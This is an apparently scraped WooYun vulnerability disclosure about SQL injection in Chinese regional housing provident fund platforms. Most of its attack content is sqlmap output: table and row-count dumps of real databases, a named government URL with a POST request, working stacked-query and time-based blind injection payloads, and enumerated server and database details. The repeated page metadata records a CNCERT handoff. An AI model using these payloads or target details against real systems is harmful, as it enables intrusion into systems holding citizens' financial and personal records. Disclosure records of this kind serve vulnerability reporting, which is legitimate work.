| dbo.D_Collection_Field                           | 66      |
| dbo.D_U_Redianwenda                              | 66      |
| dbo.D_U_Down                                     | 63      |
| dbo.D_Style                                      | 60      |
| dbo.D_Account                                    | 58      |
| dbo.D_U_Zhigongfengcai                           | 47      |
| dbo.D_U_Yewujieda                                | 40      |
| dbo.D_Class                                      | 33      |
| dbo.D_InsertWeb                                  | 29      |
| dbo.D_U_post                                     | 27      |
| dbo.D_U_zhengcefagui                             | 27      |
| dbo.D_Regex                                      | 21      |
| dbo.D_Tag                                        | 16      |
| dbo.D_InfoModel                                  | 15      |
| dbo.D_U_shoutuozhongjie                          | 15      |
| dbo.D_UserGroup                                  | 14      |
| dbo.D_Admin                                      | 12      |
| dbo.D_U_bbs                                      | 12      |
| dbo.D_User_Business                              | 12      |
| dbo.D_PowerGroup                                 | 11      |
| dbo.D_SinglePage                                 | 9       |
| dbo.D_Search                                     | 8       |
| dbo.D_UserIframe                                 | 7       |
| dbo.D_U_shoutuoyinhang                           | 6       |
| dbo.D_U_zhigongxiangce                           | 5       |
| dbo.D_Collection_Item                            | 4       |
| dbo.D_Collection_List                            | 3       |
| dbo.D_DataSource                                 | 3       |
| dbo.D_Excel                                      | 3       |
| dbo.D_LikePage                                   | 3       |
| dbo.D_VSLabel                                    | 3       |
| dbo.D_Aspxcs                                     | 2       |
| dbo.D_TemplateProgram                            | 2       |
| dbo.D_UserModel                                  | 2       |
| dbo.D_Form                                       | 1       |
| dbo.D_LabelParam                                 | 1       |
| dbo.D_LabelToFile                                | 1       |
| dbo.D_Notandum                                   | 1       |
| dbo.D_UserFavorite                               | 1       |
| dbo.D_UserGrade                                  | 1       |
| dbo.D_VoteLimit                                  | 1       |
+--------------------------------------------------+---------+
Database: master
+--------------------------------------------------+---------+
| Table                                            | Entries |
+--------------------------------------------------+---------+
| sys.messages                                     | 67941   |
| sys.sysmessages                                  | 67941   |
| sys.syscolumns                                   | 10642   |
| sys.all_parameters                               | 6697    |
| sys.system_parameters                            | 6697    |
| sys.trace_subclass_values                        | 4722    |
| sys.trace_event_bindings                         | 3958    |
| sys.all_columns                                  | 3740    |
| sys.system_columns                               | 3696    |
| sys.syscomments                                  | 2744    |
| dbo.spt_values                                   | 2346    |
| sys.all_objects                                  | 1747    |
| sys.sysobjects                                   | 1747    |
| sys.system_objects                               | 1741    |
| sys.database_permissions                         | 1641    |
| sys.syspermissions                               | 1641    |
| sys.sysprotects                                  | 1640    |
| sys.all_sql_modules                              | 1589    |
| sys.system_sql_modules                           | 1589    |
| sys.all_views                                    | 284     |
| sys.system_views                                 | 284     |
| sys.event_notification_event_types               | 193     |
| sys.trace_events                                 | 171     |
| sys.allocation_units                             | 114     |
| sys.syscharsets                                  | 114     |
| sys.dm_db_partition_stats                        | 103     |
| sys.partitions                                   | 103     |
| sys.system_components_surface_area_configuration | 98      |
| sys.xml_schema_facets                            | 97      |
| sys.xml_schema_components                        | 93      |
| sys.xml_schema_types                             | 77      |
| sys.trace_columns                                | 65      |
| sys.configurations                               | 62      |
| sys.sysconfigures                                | 62      |
| sys.syscurconfigs                                | 62      |
| sys.fulltext_document_types                      | 50      |
| sys.fulltext_languages                           | 48      |
| INFORMATION_SCHEMA.COLUMN_PRIVILEGES             | 44      |
| INFORMATION_SCHEMA.COLUMNS                       | 44      |
| sys.columns                                      | 44      |
| sys.syslanguages                                 | 33      |
| sys.systypes                                     | 27      |
| sys.types                                        | 27      |
| sys.securable_classes                            | 21      |
| sys.trace_categories                             | 21      |
| sys.xml_schema_component_placements              | 17      |
| INFORMATION_SCHEMA.SCHEMATA                      | 14      |
| sys.database_principals                          | 14      |
| sys.schemas                                      | 14      |
| sys.sysusers                                     | 14      |
| sys.xml_schema_attributes                        | 14      |
| sys.database_mirroring                           | 12      |
| sys.database_recovery_status                     | 12      |
| sys.databases                                    | 12      |
| sys.sysdatabases                                 | 12      |
| sys.server_principals                            | 11      |
| sys.service_contract_message_usages              | 11      |
| sys.server_permissions                           | 7       |
| sys.sysindexes                                   | 7       |
| sys.indexes                                      | 6       |
| sys.objects                                      | 6       |
| sys.stats_columns                                | 6       |
| INFORMATION_SCHEMA.TABLE_PRIVILEGES              | 5       |
| INFORMATION_SCHEMA.TABLES                        | 5       |
| sys.index_columns                                | 5       |
| sys.sysindexkeys                                 | 5       |
| sys.tables                                       | 5       |
| sys.endpoints                                    | 4       |
| sys.service_queue_usages                         | 3       |
| sys.stats                                        | 3       |
| sys.syssegments                                  | 3       |
| sys.xml_schema_namespaces                        | 3       |
| sys.database_files                               | 2       |
| sys.login_token                                  | 2       |
| sys.service_contract_usages                      | 2       |
| sys.sql_logins                                   | 2       |
| sys.sysfiles                                     | 2       |
| sys.syslogins                                    | 2       |
| sys.user_token                                   | 2       |
| dbo.spt_monitor                                  | 1       |
| sys.data_spaces                                  | 1       |
| sys.database_role_members                        | 1       |
| sys.default_constraints                          | 1       |
| sys.dm_exec_requests                             | 1       |
| sys.dm_exec_sessions                             | 1       |
| sys.filegroups                                   | 1       |
| sys.server_role_members                          | 1       |
| sys.servers                                      | 1       |
| sys.sysconstraints                               | 1       |
| sys.sysfilegroups                                | 1       |
| sys.sysmembers                                   | 1       |
| sys.sysprocesses                                 | 1       |
| sys.sysservers                                   | 1       |
| sys.tcp_endpoints                                | 1       |
| sys.via_endpoints                                | 1       |
| sys.xml_schema_collections                       | 1       |
| sys.xml_schema_model_groups                      | 1       |
| sys.xml_schema_wildcards                         | 1       |
+--------------------------------------------------+---------+
Database: nbgjjcx
+--------------------------------------------------+---------+
| Table                                            | Entries |
+--------------------------------------------------+---------+
| dbo.Login                                        | 4239423 |
| dbo.gj_grmx                                      | 4038930 |
| dbo.gj_grzh                                      | 656151  |
| dbo.da_grjb                                      | 600909  |
| dbo.grda                                         | 600909  |
| dbo.bk_grjb                                      | 599884  |
| dbo.gj_dwzhmx                                    | 535108  |
| dbo.da_grjbbak                                   | 448226  |
| dbo.gj_gtdwyjc                                   | 160330  |
| dbo.gj_dwzh                                      | 41865   |
| dbo.xd_fhz                                       | 34284   |
| dbo.dwxx                                         | 13954   |
| dbo.gj_dwxx                                      | 13954   |
| dbo.bk_dwxx                                      | 13875   |
| dbo.gj_dwndjs                                    | 12685   |
| dbo.gj_dwxxbak                                   | 10308   |
| dbo.dwb                                          | 8040    |
| dbo.xd_spxx                                      | 589     |
| dbo.gg_flm                                       | 66      |
+--------------------------------------------------+---------+
Database: nbgjjcxbak
+--------------------------------------------------+---------+
| Table                                            | Entries |
+--------------------------------------------------+---------+
| dbo.Login                                        | 2464637 |
| dbo.gj_grmx                                      | 2438779 |
| dbo.gj_grzh                                      | 594346  |
| dbo.da_grjb                                      | 541894  |
| dbo.grda                                         | 541894  |
| dbo.bk_grjb                                      | 539554  |
| dbo.da_grjbbak                                   | 448226  |
| dbo.gj_dwzhmx                                    | 263848  |
| dbo.gj_gtdwyjc                                   | 219828  |
| dbo.gj_dwzh                                      | 37542   |
| dbo.xd_fhz                                       | 27927   |
| dbo.dwxx                                         | 12513   |
| dbo.gj_dwxx                                      | 12513   |
| dbo.bk_dwxx                                      | 12414   |
| dbo.gj_dwndjs                                    | 11646   |
| dbo.gj_dwxxbak                                   | 10308   |
| dbo.dwb                                          | 8040    |
| dbo.xd_spxx                                      | 690     |
| dbo.gg_flm                                       | 66      |
+--------------------------------------------------+---------+
Database: nbgjjls
+--------------------------------------------------+---------+
| Table                                            | Entries |
+--------------------------------------------------+---------+
| dbo.jfmx                                         | 5381    |
| dbo.tpsc                                         | 3895    |
| dbo.chushou                                      | 2929    |
| dbo.news                                         | 867     |
| dbo.chuzu                                        | 431     |
| dbo.qxfpb                                        | 429     |
| dbo.canshu                                       | 367     |
| dbo.cspq                                         | 367     |
| dbo.zhanghao                                     | 353     |
| dbo.fcjjr                                        | 208     |
| dbo.grhy                                         | 145     |
| dbo.hxtp                                         | 141     |
| dbo.qxxtcsb                                      | 129     |
| dbo.fycjgl                                       | 36      |
| dbo.xtmkb                                        | 33      |
| dbo.bzfl                                         | 22      |
| dbo.jfcz                                         | 19      |
| dbo.dksf                                         | 18      |
| dbo.guanggao                                     | 17      |
| dbo.bznr                                         | 14      |
| dbo.zxyy                                         | 12      |
| dbo.jfdj                                         | 10      |
| dbo.liuyan                                       | 10      |
| dbo.loupan                                       | 8       |
| dbo.admin                                        | 5       |
| dbo.qiugou                                       | 4       |
| dbo.jscsb                                        | 3       |
| dbo.qiuzu                                        | 3       |
| dbo.wzlb                                         | 3       |
| dbo.zhaopin                                      | 3       |
| dbo.fbtsxz                                       | 2       |
| dbo.yqlj                                         | 2       |
| dbo.xtxx                                         | 1       |
+--------------------------------------------------+---------+

注射点3

http://hd.cixi.gov.cn/gjj.rs (POST)
user=admin&password=admin&validate=2694&timsStamp=1395555004969&job=Login&evidence=0

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: user
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: user=admin'); WAITFOR DELAY '0:0:5'--&password=admin&validate=2694&timsStamp=1395555004969&job=Login&evidence=0
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: user=admin') WAITFOR DELAY '0:0:5'--&password=admin&validate=2694&timsStamp=1395555004969&job=Login&evidence=0
---
web server operating system: Windows Vista
web application technology: ASP.NET, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2005
current user:    'oneleaf'
current database:    'IIPS_CIXI'
available databases [22]:
[*] [无照监管]
[*] [票务管理]
[*] [科技项目管理]
[*] acsp
[*] AMOA_DEMO
[*] BEDB
[*] BGCOS
[*] BGWIS
[*] BSPMS
[*] COSA
[*] exam
[*] FWZX
[*] IIPS_DIXI
[*] LED_CIXI
[*] LINKAGE
[*] lsip
[*] master
[*] model
[*] msdb
[*] SMS_CIXI
[*] TEAMWORK
[*] tempdb
//第三个注入点跑太慢，不--count了

漏洞证明：

如上

修复方案：

别走小厂商流程哦:)

版权声明：转载请注明来源超威蓝猫@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：20

确认时间：2014-03-30 23:08

厂商回复：

CNVD对所述案例进行了详细测试，并根据属地原则，转由CNCERT下发给了多个省市分中心处置。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-054399

漏洞标题：多个地区住房公积金管理平台SQL注射

相关厂商：cncert国家互联网应急中心

漏洞作者：超威蓝猫

提交时间：2014-03-26 13:00

修复时间：2014-05-10 13:01

公开时间：2014-05-10 13:01

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：18

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源超威蓝猫@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-054399

漏洞标题：多个地区住房公积金管理平台SQL注射

相关厂商：cncert国家互联网应急中心

漏洞作者： 超威蓝猫

提交时间：2014-03-26 13:00

修复时间：2014-05-10 13:01

公开时间：2014-05-10 13:01

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：18

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-054399"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 超威蓝猫@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：超威蓝猫

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源超威蓝猫@乌云